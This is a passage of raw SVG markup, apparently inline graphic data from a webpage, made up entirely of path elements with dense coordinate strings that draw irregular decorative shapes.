.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path 